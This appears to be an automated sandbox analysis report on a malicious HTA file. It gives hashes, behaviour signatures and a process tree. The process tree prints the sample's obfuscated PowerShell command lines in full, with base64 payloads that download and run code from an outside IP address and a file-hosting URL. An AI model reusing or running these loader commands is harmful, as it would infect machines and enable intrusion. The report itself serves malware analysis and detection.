Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Resource
win10v2004-20241007-en
General
-
Target
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
-
Size
207KB
-
MD5
1cc49542b6408627091678140cb916c9
-
SHA1
66e198338df798a6ef051a71feee749bae890a6d
-
SHA256
0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
-
SHA512
1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b
-
SSDEEP
96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
pOWeRSheLl.EXEflow pid Process 3 3020 pOWeRSheLl.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 948 powershell.exe 1960 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepid Process 3020 pOWeRSheLl.EXE 2672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exemshta.exepOWeRSheLl.EXEpowershell.execsc.execvtres.exeWScript.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSheLl.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepowershell.exepowershell.exepid Process 3020 pOWeRSheLl.EXE 2672 powershell.exe 3020 pOWeRSheLl.EXE 3020 pOWeRSheLl.EXE 948 powershell.exe 1960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
pOWeRSheLl.EXEpowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3020 pOWeRSheLl.EXE Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
mshta.exepOWeRSheLl.EXEcsc.exeWScript.exepowershell.exedescription pid Process procid_target PID 2448 wrote to memory of 3020 2448 mshta.exe 30 PID 2448 wrote to memory of 3020 2448 mshta.exe 30 PID 2448 wrote to memory of 3020 2448 mshta.exe 30 PID 2448 wrote to memory of 3020 2448 mshta.exe 30 PID 3020 wrote to memory of 2672 3020 pOWeRSheLl.EXE 32 PID 3020 wrote to memory of 2672 3020 pOWeRSheLl.EXE 32 PID 3020 wrote to memory of 2672 3020 pOWeRSheLl.EXE 32 PID 3020 wrote to memory of 2672 3020 pOWeRSheLl.EXE 32 PID 3020 wrote to memory of 2068 3020 pOWeRSheLl.EXE 33 PID 3020 wrote to memory of 2068 3020 pOWeRSheLl.EXE 33 PID 3020 wrote to memory of 2068 3020 pOWeRSheLl.EXE 33 PID 3020 wrote to memory of 2068 3020 pOWeRSheLl.EXE 33 PID 2068 wrote to memory of 2224 2068 csc.exe 34 PID 2068 wrote to memory of 2224 2068 csc.exe 34 PID 2068 wrote to memory of 2224 2068 csc.exe 34 PID 2068 wrote to memory of 2224 2068 csc.exe 34 PID 3020 wrote to memory of 2000 3020 pOWeRSheLl.EXE 36 PID 3020 wrote to memory of 2000 3020 pOWeRSheLl.EXE 36 PID 3020 wrote to memory of 2000 3020 pOWeRSheLl.EXE 36 PID 3020 wrote to memory of 2000 3020 pOWeRSheLl.EXE 36 PID 2000 wrote to memory of 948 2000 WScript.exe 37 PID 2000 wrote to memory of 948 2000 WScript.exe 37 PID 2000 wrote to memory of 948 2000 WScript.exe 37 PID 2000 wrote to memory of 948 2000 WScript.exe 37 PID 948 wrote to memory of 1960 948 powershell.exe 39 PID 948 wrote to memory of 1960 948 powershell.exe 39 PID 948 wrote to memory of 1960 948 powershell.exe 39 PID 948 wrote to memory of 1960 948 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gajkybws.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55AF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC559F.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cfb7007c6136321ce57ceae71b134418
SHA13db4537ca974b0ea9b951099d9579754efe32134
SHA25683c88eced98885b81beb5d6e53e6cf25f5f6bfb5c20d9e443461753573c05200
SHA51259497e35bee4b0eba64ec15319e6747255b3eafe04f781c912a3c02766cf8a7ec1f0b7f0234a0e554af2fa1b9323a4c31b1f6b17d9bc6f8a8aa7bb317d96b5f1
-
Filesize
3KB
MD58302414a34d62a438c28cabab3b7a40e
SHA104bd5cbdda34be8ba1d039ad25b61469fb2960d7
SHA256c853a9fd5b796bd9a1ed6f6a9d1205797e5d410b7f50e9ec7880c6d782cc60af
SHA5127b25341c043fe58ad5e49466112e5ca68709bebe46579c3e9d1e00fc3c176611f39aa27a8e9dca9310526987b5ec461d35925db2b67b68e163a4884dbcf3e840
-
Filesize
7KB
MD5ac915f97237545697225fb9f21b17c4d
SHA1aa48c6e376a9e92e41a2dbd8d86774d078ed17f4
SHA256f88b043e55a6d6e2451d2c9ac527a1bec563525eaa54d4054fcbdd6e92a34df8
SHA512c8d48e55a44a899b50152a3411279e6d8da22e48a7b8c123a2b6ac79ba9f49b9e6d00cbeba29284822e4693cd20d03e3472d2154e4e29fc14f875fa6e00cce96
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5fbd917f6d90002f6564f790cf6ae0c46
SHA132bff93a180f61410917cf7082617510c8bca454
SHA25650ebd0b684de3496de6565295dfbe24d702fe73d1f209be1ea2aeb6d1e9fd894
SHA5124b5f092903b511f87a926ecf5b02771f3e055eeef98665aa5b4093c04bbb0f473407a48f87e747a1815a426656967d76082a5883021c3c892ed49c9ba48068fc
-
Filesize
138KB
MD54f46597a54e903c400cac4db5a222ecb
SHA10a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5651eab3d69a3935ee7394499c5bd05cb
SHA196bdfb0e540f1f5c780cc9063d41c8c49a50b7d7
SHA25654405b4f4c645130db3743fc016b371b7c85f2f2551e71c8332ab37c17a05bcd
SHA5123a8f966a7b5b37ad3100f69e40b85391c007949a934b00de87973ac0e90fb537bbde1b28c7d3f53b813e9263936467cc8643e7f292dcaaf21a084444683c63dc
-
Filesize
483B
MD50b9734ed54c4f41d0c94957b007eb3d5
SHA1ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA25636632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17
-
Filesize
309B
MD5ad0abdfe1d391631322dbcf7f85d256a
SHA10df977f2d9557da9f7367a68ca17fed54e544db3
SHA2565cbd4a61f32011d5dbb77c39dfe3002f51463a3bd2c40f1f5fa4645b5f351226
SHA51292455bc99bd95e05479751efbbf2c63d6dd95d4716eee029951036a89546dfeb109707f3ae2ff172995c510e620f0999a3bda415a5975aace2acc43b9a4dd17b